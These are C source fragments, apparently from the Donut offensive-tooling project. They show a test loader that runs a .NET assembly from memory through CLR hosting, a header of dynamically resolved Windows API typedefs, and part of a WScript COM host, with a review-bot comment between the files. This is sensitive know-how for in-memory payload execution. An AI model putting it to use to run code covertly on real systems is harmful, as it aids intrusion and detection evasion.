266 hr = nfo->get_EventHandlerType(&evt);
267 printf("EventHandlerType(ProcessExit) : HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
268
269 BSTR type_name, base_name;
270 mscorlib::_TypePtr base_type, ref_type;
271
272 evt->get_name(&type_name);
273 evt->get_BaseType(&base_type);
274 base_type->get_name(&base_name);
275
276 wprintf(L"Event Type : %s\nBase Type : %s\n", type_name, base_name);
277
278 printf("my_function = %p\n", (void*)my_function);
279
280 // SAFEARRAY(VARIANT)
281 sav = SafeArrayCreateVector(VT_VARIANT, 0, 2);
282
283 VariantClear(&v_ptr);
284 V_BYREF(&v_ptr) = (PVOID)my_function;
285 V_VT(&v_ptr) = VT_INT;
286
287 idx = 0;
288 SafeArrayPutElement(sav, &idx, &v_ptr);
289
290 BSTR strZ = SysAllocString(L"System.MultiDelegate");
291 hr = as2->GetType_2(strZ, &type);
292 printf("System.Delegate = %lx, %p\n", hr, (void*)type);
293
294 idx = 1;
295 V_VT(&v_type) = VT_UNKNOWN;
296 V_UNKNOWN(&v_type) = type;
297 SafeArrayPutElement(sav, &idx, &type);
298
299 v1.vt = VT_EMPTY;
300 VariantClear(&ret);
301
302 printf("Calling GetDelegateForFunctionPointer\n");
303 hr = mi->Invoke_3(
304 v1,
305 sav, // arguments to method
306 &ret); // return value from method
307
308 printf("Invoke_3(GetDelegateForFunctionPointer) HRESULT : %08lx : %x : %p\n", hr, V_VT(&ret), V_BYREF(&ret));
309
310 /**if(hr != S_OK) {
311 printf("Failed to obtain delegate\n");
312 return;
313 }*/
314
315 printf("Delegate : %p\n", ret.punkVal);
316
317 hr = ret.punkVal->QueryInterface(IID_IUnknown, (void**)&handler);
318 printf("HRESULT : %08lx : %p\n", hr, (void*)handler);
319
320 hr = ad->add_ProcessExit(handler);
321 printf("HRESULT : %08lx\n", hr);
322
323 sab.lLbound = 0;
324 sab.cElements = len;
325 printf("SafeArrayCreate()\n");
326 sa = SafeArrayCreate(VT_UI1, 1, &sab);
327
328 if(sa != NULL) {
329 CopyMemory(sa->pvData, code, len);
330 printf("AppDomain::Load_3()\n");
331 hr = ad->Load_3(sa, &as);
332 if(SUCCEEDED(hr)) {
333 printf("Assembly::get_EntryPoint()\n");
334 hr = as->get_EntryPoint(&mi);
335 if(SUCCEEDED(hr)) {
336 v1.vt = VT_NULL;
337 v1.plVal = NULL;
338 printf("MethodInfo::Invoke_3()\n");
339 hr = mi->Invoke_3(v1, NULL, &v2);
340 mi->Release();
341 }
342 as->Release();
343 }
344 SafeArrayDestroy(sa);
345 }
346 ad->Release();
347 }
348 iu->Release();
349 }
350 icrh->Stop();
351 }
352 icrh->Release();
353 }
354
355 int main(int argc, char *argv[])
356 {
357 void *mem;
358 struct stat fs;
359 FILE *fd;
360
361 if(argc != 2) {
362 printf("usage: rundotnet <.NET assembly>\n");
363 return 0;
364 }
365
366 // 1. get the size of file
367 stat(argv[1], &fs);
368
369 if(fs.st_size == 0) {
370 printf("file is empty.\n");
371 return 0;
372 }
373
374 // 2. try open assembly
375 fd = fopen(argv[1], "rb");
376 if(fd == NULL) {
377 printf("unable to open \"%s\".\n", argv[1]);
378 return 0;
379 }
380 // 3. allocate memory
381 mem = malloc(fs.st_size);
382 if(mem != NULL) {
383 // 4. read file into memory
384 fread(mem, 1, fs.st_size, fd);
385 // 5. run the program from memory
386 rundotnet(mem, fs.st_size);
387 // 6. free memory
388 free(mem);
389 }
390 // 7. close assembly
391 fclose(fd);
392
393 return 0;
394 }
395
396 /**
397 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
398 BSTR i32 = SysAllocString(L"System.Int32");
399
400 as2->GetType_2(i32, &ptr);
401 idx = 0;
402 SafeArrayPutElement(sav, &idx, ptr);
403
404 BSTR alloc = SysAllocString(L"AllocHGlobal");
405 BSTR marshal = SysAllocString(L"System.Runtime.InteropServices.Marshal");
406 hr = as1->GetType_2(marshal, &mars);
407
408 hr = mars->GetMethod(alloc,
409 (mscorlib::BindingFlags)
410 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
411 NULL, // Binder
412 sav, // SAFEARRAY(_Type*)
413 NULL, // Modifiers
414 &mi); // MethodInfo
415
416 printf("System.Runtime.InteropServices.Marshal.GetMethod(AllocCoTaskMem) : %lx\n", hr);
417
418 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
419 idx = 0;
420 V_VT(&v_type) = VT_I4;
421 V_I4(&v_type) = 0x12345678;
422 SafeArrayPutElement(sav, &idx, &v_type);
423
424 v1.vt = VT_EMPTY;
425 VariantClear(&ret);
426
427 printf("Press any key to continue...\n");
428 getchar();
429
430 printf("Calling AllocCoTaskMem\n");
431 hr = mi->Invoke_3(
432 v1,
433 sav, // arguments to method
434 &ret); // return value from method
435
436 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&ret));
437 getchar();
438 return;
439 */
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WINAPI_H
32 #define WINAPI_H
33
34 #include <windows.h>
35
36 typedef void (WINAPI *Sleep_t)(DWORD dwMilliseconds);
37
38 typedef int (WINAPI *MultiByteToWideChar_t)(
39 UINT CodePage,
40 DWORD dwFlags,
41 LPCCH lpMultiByteStr,
42 int cbMultiByte,
43 LPWSTR lpWideCharStr,
44 int cchWideChar);
45
46 typedef int (WINAPI *WideCharToMultiByte_t)(
47 UINT CodePage,
48 DWORD dwFlags,
49 LPCWCH lpWideCharStr,
50 int cchWideChar,
51 LPSTR lpMultiByteStr,
52 int cbMultiByte,
53 LPCCH lpDefaultChar,
54 LPBOOL lpUsedDefaultChar);
55
56 typedef LPWSTR* (WINAPI *CommandLineToArgvW_t)(LPCWSTR lpCmdLine, int* pNumArgs);
57
58 // imports from shlwapi.dll
59 typedef LSTATUS (WINAPI *SHGetValueA_t)(
60 HKEY hkey,
61 LPCSTR pszSubKey,
62 LPCSTR pszValue,
63 DWORD *pdwType,
64 void *pvData,
65 DWORD *pcbData);
66
67 // imports from mscoree.dll
68 typedef HRESULT (WINAPI *CLRCreateInstance_t)(
69 REFCLSID clsid,
70 REFIID riid,
71 LPVOID *ppInterface);
72
73 typedef HRESULT (WINAPI *CorBindToRuntime_t) (
74 LPCWSTR pwszVersion,
75 LPCWSTR pwszBuildFlavor,
76 REFCLSID rclsid,
77 REFIID riid,
78 LPVOID FAR *ppv);
79
80 // imports from ole32.dll
81 typedef HRESULT (WINAPI *CoInitializeEx_t)(
82 LPVOID pvReserved,
83 DWORD dwCoInit);
84
85 typedef void (WINAPI *CoUninitialize_t)(void);
86
87 typedef HRESULT (WINAPI *CoCreateInstance_t)(
88 REFCLSID rclsid,
89 LPUNKNOWN pUnkOuter,
90 DWORD dwClsContext,
91 REFIID riid,
92 LPVOID *ppv);
93
94 typedef HRESULT (WINAPI *CreateStdDispatch_t)(
95 IUnknown *punkOuter,
96 void *pvThis,
97 ITypeInfo *ptinfo,
98 IUnknown **ppunkStdDisp);
99
100 typedef HRESULT (WINAPI *CreateErrorInfo_t)(
101 ICreateErrorInfo **pperrinfo);
102
103 typedef HRESULT (WINAPI *CreateDispTypeInfo_t)(
104 INTERFACEDATA *pidata,
105 LCID lcid,
106 ITypeInfo **pptinfo);
107
108 typedef HRESULT (WINAPI *GetErrorInfo_t)(
109 ULONG dwReserved,
110 IErrorInfo **pperrinfo);
111
112 typedef HRESULT (WINAPI *LoadTypeLib_t)(
113 LPCOLESTR szFile,
114 ITypeLib **pptlib);
115
116 typedef HRESULT (WINAPI *LoadTypeLibEx_t)(
117 LPCOLESTR szFile,
118 REGKIND regkind,
119 ITypeLib **pptlib);
120
121 typedef LCID (WINAPI *GetUserDefaultLCID_t)(VOID);
122
123 // imports from oleaut32.dll
124 typedef HRESULT (WINAPI *SafeArrayGetLBound_t)(
125 SAFEARRAY *psa,
126 UINT nDim,
127 LONG *plLbound);
128
129 typedef HRESULT (WINAPI *SafeArrayGetUBound_t)(
130 SAFEARRAY *psa,
131 UINT nDim,
132 LONG *plUbound);
133
134 typedef SAFEARRAY* (WINAPI *SafeArrayCreate_t)(
135 VARTYPE vt,
136 UINT cDims,
137 SAFEARRAYBOUND *rgsabound);
138
139 typedef SAFEARRAY* (WINAPI *SafeArrayCreateVector_t)(
140 VARTYPE vt,
141 LONG lLbound,
142 ULONG cElements);
143
144 typedef HRESULT (WINAPI *SafeArrayPutElement_t)(
145 SAFEARRAY *psa,
146 LONG *rgIndices,
147 void *pv);
148
149 typedef HRESULT (WINAPI *SafeArrayDestroy_t)(
150 SAFEARRAY *psa);
151
152 typedef BSTR (WINAPI *SysAllocString_t)(
153 const OLECHAR *psz);
154
155 typedef void (WINAPI *SysFreeString_t)(
156 BSTR bstrString);
157
158 // imports from kernel32.dll
159 typedef HMODULE (WINAPI *LoadLibraryA_t)(
160 LPCSTR lpLibFileName);
161
162 typedef FARPROC (WINAPI *GetProcAddress_t)(
163 HMODULE hModule,
164 LPCSTR lpProcName);
165
166 typedef BOOL (WINAPI *AllocConsole_t)(void);
167
168 typedef BOOL (WINAPI *AttachConsole_t)(
169 DWORD dwProcessId);
170
171 typedef BOOL (WINAPI *SetConsoleCtrlHandler_t)(
172 PHANDLER_ROUTINE HandlerRoutine,
173 BOOL Add);
174
175 typedef HANDLE (WINAPI *GetStdHandle_t)(
176 DWORD nStdHandle);
177
178 typedef BOOL (WINAPI *SetStdHandle_t)(
179 DWORD nStdHandle,
180 HANDLE hHandle);
181
182 typedef HANDLE (WINAPI *CreateFileA_t)(
183 LPCSTR lpFileName,
184 DWORD dwDesiredAccess,
185 DWORD dwShareMode,
186 LPSECURITY_ATTRIBUTES lpSecurityAttributes,
187 DWORD dwCreationDisposition,
188 DWORD dwFlagsAndAttributes,
189 HANDLE hTemplateFile);
190
191 typedef HANDLE (WINAPI *CreateEventA_t)(
192 LPSECURITY_ATTRIBUTES lpEventAttributes,
193 BOOL bManualReset,
194 BOOL bInitialState,
195 LPCSTR lpName);
196
197 typedef BOOL (WINAPI *CloseHandle_t)(HANDLE hObject);
198
199 typedef BOOL (WINAPI *SetEvent_t)(HANDLE hEvent);
200
201 typedef DWORD (WINAPI *GetCurrentThreadId_t)(VOID);
202
203 typedef DWORD (WINAPI *GetCurrentProcessId_t)(VOID);
204
205 typedef HHOOK (WINAPI *SetWindowsHookExA_t)(
206 int idHook,
207 HOOKPROC lpfn,
208 HINSTANCE hmod,
209 DWORD dwThreadId);
210
211 typedef BOOL (WINAPI *CreateProcessA_t)(
212 LPCSTR lpApplicationName,
213 LPSTR lpCommandLine,
214 LPSECURITY_ATTRIBUTES lpProcessAttributes,
215 LPSECURITY_ATTRIBUTES lpThreadAttributes,
216 BOOL bInheritHandles,
217 DWORD dwCreationFlags,
218 LPVOID lpEnvironment,
219 LPCSTR lpCurrentDirectory,
220 LPSTARTUPINFOA lpStartupInfo,
221 LPPROCESS_INFORMATION lpProcessInformation);
222
223 typedef DWORD (WINAPI *WaitForSingleObject_t)(
224 HANDLE hHandle,
225 DWORD dwMilliseconds);
226
227 // imports from wininet.dll
228 typedef BOOL (WINAPI *InternetCrackUrl_t)(
229 LPCSTR lpszUrl,
230 DWORD dwUrlLength,
231 DWORD dwFlags,
232 LPURL_COMPONENTS lpUrlComponents);
233
234 typedef HINTERNET (WINAPI *InternetOpen_t)(
235 LPCSTR lpszAgent,
236 DWORD dwAccessType,
237 LPCSTR lpszProxy,
238 LPCSTR lpszProxyBypass,
239 DWORD dwFlags);
240
241 typedef HINTERNET (WINAPI *InternetConnect_t)(
242 HINTERNET hInternet,
243 LPCSTR lpszServerName,
244 INTERNET_PORT nServerPort,
245 LPCSTR lpszUserName,
246 LPCSTR lpszPassword,
247 DWORD dwService,
248 DWORD dwFlags,
249 DWORD_PTR dwContext);
250
251 typedef HINTERNET (WINAPI *HttpOpenRequest_t)(
252 HINTERNET hConnect,
253 LPCSTR lpszVerb,
254 LPCSTR lpszObjectName,
255 LPCSTR lpszVersion,
256 LPCSTR lpszReferrer,
257 LPCSTR *lplpszAcceptTypes,
258 DWORD dwFlags,
259 DWORD_PTR dwContext);
260
261 typedef BOOL (WINAPI *InternetSetOption_t)(
262 HINTERNET hInternet,
263 DWORD dwOption,
264 LPVOID lpBuffer,
265 DWORD dwBufferLength);
266
267 typedef BOOL (WINAPI *HttpSendRequest_t)(
268 HINTERNET hRequest,
269 LPCSTR lpszHeaders,
270 DWORD dwHeadersLength,
271 LPVOID lpOptional,
272 DWORD dwOptionalLength);
273
274 typedef BOOL (WINAPI *HttpQueryInfo_t)(
275 HINTERNET hRequest,
276 DWORD dwInfoLevel,
277 LPVOID lpBuffer,
278 LPDWORD lpdwBufferLength,
279 LPDWORD lpdwIndex);
280
281 typedef BOOL (WINAPI *InternetReadFile_t)(
282 HINTERNET hFile,
283 LPVOID lpBuffer,
284 DWORD dwNumberOfBytesToRead,
285 LPDWORD lpdwNumberOfBytesRead);
286
287 typedef BOOL (WINAPI *InternetCloseHandle_t)(
288 HINTERNET hInternet);
289
290 typedef BOOL (WINAPI *CryptAcquireContext_t)(
291 HCRYPTPROV *phProv,
292 LPCSTR szContainer,
293 LPCSTR szProvider,
294 DWORD dwProvType,
295 DWORD dwFlags);
296
297 typedef void (WINAPI *GetSystemInfo_t)(
298 LPSYSTEM_INFO lpSystemInfo);
299
300 typedef SIZE_T (WINAPI *VirtualQuery_t)(
301 LPCVOID lpAddress,
302 PMEMORY_BASIC_INFORMATION lpBuffer,
303 SIZE_T dwLength);
304
305 typedef BOOL (WINAPI *VirtualProtect_t)(
306 LPVOID lpAddress,
307 SIZE_T dwSize,
308 DWORD flNewProtect,
309 PDWORD lpflOldProtect);
310
311 typedef HMODULE (WINAPI *GetModuleHandleA_t)(
312 LPCSTR lpModuleName);
313
314 typedef HMODULE (WINAPI *LoadLibraryExA_t)(
315 LPCSTR lpLibFileName,
316 HANDLE hFile,
317 DWORD dwFlags);
318
319 typedef HMODULE (WINAPI *LoadLibraryExW_t)(
320 LPCWSTR lpLibFileName,
321 HANDLE hFile,
322 DWORD dwFlags);
323
324 typedef BOOL (WINAPI *CryptStringToBinaryA_t)(
325 LPCSTR pszString,
326 DWORD cchString,
327 DWORD dwFlags,
328 BYTE *pbBinary,
329 DWORD *pcbBinary,
330 DWORD *pdwSkip,
331 DWORD *pdwFlags);
332
333 typedef BOOL (WINAPI *CryptDecodeObjectEx_t)(
334 DWORD dwCertEncodingType,
335 LPCSTR lpszStructType,
336 const BYTE *pbEncoded,
337 DWORD cbEncoded,
338 DWORD dwFlags,
339 PCRYPT_DECODE_PARA pDecodePara,
340 void *pvStructInfo,
341 DWORD *pcbStructInfo);
342
343 typedef BOOL (WINAPI *CryptImportPublicKeyInfo_t)(
344 HCRYPTPROV hCryptProv,
345 DWORD dwCertEncodingType,
346 PCERT_PUBLIC_KEY_INFO pInfo,
347 HCRYPTKEY *phKey);
348
349 typedef BOOL (WINAPI *CryptCreateHash_t)(
350 HCRYPTPROV hProv,
351 ALG_ID Algid,
352 HCRYPTKEY hKey,
353 DWORD dwFlags,
354 HCRYPTHASH *phHash);
355
356 typedef BOOL (WINAPI *CryptHashData_t)(
357 HCRYPTHASH hHash,
358 const BYTE *pbData,
359 DWORD dwDataLen,
360 DWORD dwFlags);
361
362 typedef BOOL (WINAPI *CryptVerifySignature_t)(
363 HCRYPTHASH hHash,
364 const BYTE *pbSignature,
365 DWORD dwSigLen,
366 HCRYPTKEY hPubKey,
367 LPCSTR szDescription,
368 DWORD dwFlags);
369
370 typedef BOOL (WINAPI *CryptDestroyHash_t)(
371 HCRYPTHASH hHash);
372
373 typedef BOOL (WINAPI *CryptDestroyKey_t)(
374 HCRYPTKEY hKey);
375
376 typedef BOOL (WINAPI *CryptReleaseContext_t)(
377 HCRYPTPROV hProv,
378 DWORD dwFlags);
379
380 typedef LPVOID (WINAPI *VirtualAlloc_t)(
381 LPVOID lpAddress,
382 SIZE_T dwSize,
383 DWORD flAllocationType,
384 DWORD flProtect);
385
386 typedef BOOL (WINAPI *VirtualFree_t)(
387 LPVOID lpAddress,
388 SIZE_T dwSize,
389 DWORD dwFreeType);
390
391 typedef HLOCAL (WINAPI *LocalFree_t)(
392 HLOCAL hMem);
393
394 typedef HRSRC (WINAPI *FindResource_t)(
395 HMODULE hModule,
396 LPCSTR lpName,
397 LPCSTR lpType);
398
399 typedef HGLOBAL (WINAPI *LoadResource_t)(
400 HMODULE hModule,
401 HRSRC hResInfo);
402
403 typedef LPVOID (WINAPI *LockResource_t)(
404 HGLOBAL hResData);
405
406 typedef DWORD (WINAPI *SizeofResource_t)(
407 HMODULE hModule,
408 HRSRC hResInfo);
409
410 typedef void (WINAPI *RtlZeroMemory_t)(
411 LPVOID Destination,
412 SIZE_T Length);
413
414 typedef BOOL (WINAPI *RtlEqualUnicodeString_t)(
415 PUNICODE_STRING String1,
416 PUNICODE_STRING String2,
417 BOOLEAN CaseInSensitive);
418
419 typedef BOOL (WINAPI *RtlEqualString_t)(
420 const ANSI_STRING * String1,
421 const ANSI_STRING * String2,
422 BOOLEAN CaseInSensitive);
423
424 typedef NTSTATUS (WINAPI *RtlUnicodeStringToAnsiString_t)(
425 PANSI_STRING DestinationString,
426 PUNICODE_STRING SourceString,
427 BOOLEAN AllocateDestinationString);
428
429 typedef void (WINAPI *RtlInitUnicodeString_t)(
430 PUNICODE_STRING DestinationString,
431 PCWSTR SourceString);
432
433 typedef void (WINAPI *RtlExitUserThread_t)(UINT uExitCode);
434
435 typedef void (WINAPI *RtlExitUserProcess_t)(NTSTATUS ExitStatus);
436
437 typedef HANDLE (WINAPI *CreateThread_t)(
438 LPSECURITY_ATTRIBUTES lpThreadAttributes,
439 SIZE_T dwStackSize,
440 LPTHREAD_START_ROUTINE lpStartAddress,
441 LPVOID lpParameter,
442 DWORD dwCreationFlags,
443 LPDWORD lpThreadId);
444
445 typedef BOOL (WINAPI *RtlCreateUnicodeString_t)(
446 PUNICODE_STRING DestinationString,
447 PCWSTR SourceString);
448
449 typedef NTSTATUS (WINAPI *RtlGetCompressionWorkSpaceSize_t)(
450 USHORT CompressionFormatAndEngine,
451 PULONG CompressBufferWorkSpaceSize,
452 PULONG CompressFragmentWorkSpaceSize);
453
454 typedef NTSTATUS (WINAPI *RtlCompressBuffer_t)(
455 USHORT CompressionFormatAndEngine,
456 PUCHAR UncompressedBuffer,
457 ULONG UncompressedBufferSize,
458 PUCHAR CompressedBuffer,
459 ULONG CompressedBufferSize,
460 ULONG UncompressedChunkSize,
461 PULONG FinalCompressedSize,
462 PVOID WorkSpace);
463
464 typedef NTSTATUS (WINAPI *RtlDecompressBuffer_t)(
465 USHORT CompressionFormatAndEngine,
466 PUCHAR UncompressedBuffer,
467 ULONG UncompressedBufferSize,
468 PUCHAR CompressedBuffer,
469 ULONG CompressedBufferSize,
470 PULONG FinalUncompressedSize);
471
472 typedef NTSTATUS (WINAPI *RtlDecompressBufferEx_t)(
473 USHORT CompressionFormatAndEngine,
474 PUCHAR UncompressedBuffer,
475 ULONG UncompressedBufferSize,
476 PUCHAR CompressedBuffer,
477 ULONG CompressedBufferSize,
478 PULONG FinalUncompressedSize,
479 PVOID WorkSpace);
480
481 typedef NTSTATUS (WINAPI *RtlUserThreadStart_t)(
482 LPTHREAD_START_ROUTINE lpStartAddress,
483 LPVOID lpParameter);
484
485 typedef NTSTATUS (WINAPI *NtContinue_t)(
486 PCONTEXT ContextRecord,
487 BOOLEAN TestAlert);
488
489 typedef BOOL (WINAPI *SetThreadContext_t)(
490 HANDLE hThread,
491 const CONTEXT *lpContext);
492
493 typedef BOOL (WINAPI *GetThreadContext_t)(
494 HANDLE hThread,
495 LPCONTEXT lpContext);
496
497 typedef HANDLE (WINAPI *GetCurrentThread_t)(VOID);
498 #endif
499
500
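Review bot: The header is not self-contained: it includes only `<windows.h>` (line 34), yet the typedefs from line 228 onward use `HINTERNET`, `INTERNET_PORT` and `LPURL_COMPONENTS` (declared in wininet.h) and those from line 414 onward use `PUNICODE_STRING`, `ANSI_STRING` and `NTSTATUS` (declared in winternl.h), so it only compiles when the including translation unit has already pulled those headers in. Either add `#include <wininet.h>` and `#include <winternl.h>` after line 34 or state the prerequisite in a comment inside the include guard. The `// imports from ...` grouping also stops matching the content after line 289: the `Crypt*` typedefs that follow are advapi32.dll and crypt32.dll exports rather than wininet.dll, and the `Rtl*`/`Nt*` typedefs from line 410 onward are ntdll.dll exports, so a `// imports from advapi32.dll / crypt32.dll` comment before line 290 and a `// imports from ntdll.dll` comment before line 410 would keep the comments usable as a resolution guide. Lines 414 and 419 declare `RtlEqualUnicodeString_t` and `RtlEqualString_t` as returning `BOOL`, but ntdll returns `BOOLEAN` (a byte) from both, and a byte-returning callee leaves the upper bits of EAX unspecified, so a caller testing the full 32-bit value can misread the comparison; declare them `BOOLEAN` to match the exported signature.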
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // initialize interface with methods/properties
32 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host) {
33 HRESULT hr;
34 WCHAR buf[DONUT_MAX_NAME+1];
35
36 // IUnknown interface
37 host->lpVtbl->QueryInterface = ADR(LPVOID, Host_QueryInterface);
38 host->lpVtbl->AddRef = ADR(LPVOID, Host_AddRef);
39 host->lpVtbl->Release = ADR(LPVOID, Host_Release);
40
41 // IDispatch interface
42 host->lpVtbl->GetTypeInfoCount = ADR(LPVOID, Host_GetTypeInfoCount);
43 host->lpVtbl->GetTypeInfo = ADR(LPVOID, Host_GetTypeInfo);
44 host->lpVtbl->GetIDsOfNames = ADR(LPVOID, Host_GetIDsOfNames);
45 host->lpVtbl->Invoke = ADR(LPVOID, Host_Invoke);
46
47 // IHost interface
48 host->lpVtbl->get_Name = ADR(LPVOID, Host_get_Name);
49 host->lpVtbl->get_Application = ADR(LPVOID, Host_get_Application);
50 host->lpVtbl->get_FullName = ADR(LPVOID, Host_get_FullName);
51 host->lpVtbl->get_Path = ADR(LPVOID, Host_get_Path);
52 host->lpVtbl->get_Interactive = ADR(LPVOID, Host_get_Interactive);
53 host->lpVtbl->put_Interactive = ADR(LPVOID, Host_put_Interactive);
54 host->lpVtbl->Quit = ADR(LPVOID, Host_Quit);
55 host->lpVtbl->get_ScriptName = ADR(LPVOID, Host_get_ScriptName);
56 host->lpVtbl->get_ScriptFullName = ADR(LPVOID, Host_get_ScriptFullName);
57 host->lpVtbl->get_Arguments = ADR(LPVOID, Host_get_Arguments);
58 host->lpVtbl->get_Version = ADR(LPVOID, Host_get_Version);
59 host->lpVtbl->get_BuildVersion = ADR(LPVOID, Host_get_BuildVersion);
60 host->lpVtbl->get_Timeout = ADR(LPVOID, Host_get_Timeout);
61 host->lpVtbl->put_Timeout = ADR(LPVOID, Host_put_Timeout);
62 host->lpVtbl->CreateObject = ADR(LPVOID, Host_CreateObject);
63 host->lpVtbl->Echo = ADR(LPVOID, Host_Echo);
64 host->lpVtbl->GetObject = ADR(LPVOID, Host_GetObject);
65 host->lpVtbl->DisconnectObject = ADR(LPVOID, Host_DisconnectObject);
66 host->lpVtbl->Sleep = ADR(LPVOID, Host_Sleep);
67 host->lpVtbl->ConnectObject = ADR(LPVOID, Host_ConnectObject);
68 host->lpVtbl->get_StdIn = ADR(LPVOID, Host_get_StdIn);
69 host->lpVtbl->get_StdOut = ADR(LPVOID, Host_get_StdOut);
70 host->lpVtbl->get_StdErr = ADR(LPVOID, Host_get_StdErr);
71
72 host->m_cRef = 0;
73 host->inst = inst;
74
75 DPRINT("LoadTypeLib(\"%s\")", inst->wscript_exe);
76 ansi2unicode(inst, inst->wscript_exe, buf);
77 hr = inst->api.LoadTypeLib(buf, &host->lpTypeLib);
78
79 if(hr == S_OK) {
80 DPRINT("ITypeLib::GetTypeInfoOfGuid");
81
82 hr = host->lpTypeLib->lpVtbl->GetTypeInfoOfGuid(
83 host->lpTypeLib, &inst->xIID_IHost, &host->lpTypeInfo);
84 }
85 DPRINT("HRESULT : %08lx", hr);
86 return hr;
87 }
88
89 // Queries a COM object for a pointer to one of its interface.
90 static HRESULT WINAPI Host_QueryInterface(IHost *iface, REFIID riid, void **ppv) {
91 DPRINT("WScript::QueryInterface");
92
93 if(ppv == NULL) return E_POINTER;
94
95 // we implement the following interfaces
96 if(IsEqualIID(&iface->inst->xIID_IUnknown, riid) ||
97 IsEqualIID(&iface->inst->xIID_IDispatch, riid) ||
98 IsEqualIID(&iface->inst->xIID_IHost, riid))
99 {
100 *ppv = iface;
101 return S_OK;
102 }
103 *ppv = NULL;
104 return E_NOINTERFACE;
105 }
106
107 // Increments the reference count for an interface pointer to a COM object.
108 static ULONG WINAPI Host_AddRef(IHost *iface) {
109 DPRINT("WScript::AddRef");
110
111 _InterlockedIncrement(&iface->m_cRef);
112 return iface->m_cRef;
113 }
114
115 // Decrements the reference count for an interface on a COM object.
116 static ULONG WINAPI Host_Release(IHost *iface) {
117 DPRINT("WScript::Release");
118
119 ULONG ref = _InterlockedDecrement(&iface->m_cRef);
120 return ref;
121 }
122
123 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
124 static HRESULT WINAPI Host_GetTypeInfoCount(IHost *iface, UINT *pctinfo) {
125 DPRINT("WScript::GetTypeInfoCount");
126
127 if(pctinfo == NULL) return E_POINTER;
128
129 *pctinfo = 1;
130 return S_OK;
131 }
132
133 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
134 static HRESULT WINAPI Host_GetTypeInfo(IHost *iface, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo) {
135 DPRINT("WScript::GetTypeInfo");
136
137 if(ppTInfo == NULL) return E_POINTER;
138
139 iface->lpTypeInfo->lpVtbl->AddRef(iface->lpTypeInfo);
140 *ppTInfo = iface->lpTypeInfo;
141
142 return S_OK;
143 }
144
145 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
146 // which can be used on subsequent calls to Invoke.
147 static HRESULT WINAPI Host_GetIDsOfNames(IHost *iface, REFIID riid,
148 LPOLESTR *rgszNames, UINT cNames, LCID lcid, DISPID *rgDispId) {
149 DPRINT("WScript::GetIDsOfNames");
150
151 return iface->lpTypeInfo->lpVtbl->GetIDsOfNames(iface->lpTypeInfo, rgszNames, cNames, rgDispId);
152 }
153
154 // Provides access to properties and methods exposed by an object.
155 // The dispatch function DispInvoke provides a standard implementation of Invoke.
156 static HRESULT WINAPI Host_Invoke(
157 IHost *iface, DISPID dispIdMember, REFIID riid,
158 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
159 EXCEPINFO *pExcepInfo, UINT *puArgErr) {
160
161 DPRINT("WScript::Invoke");
162
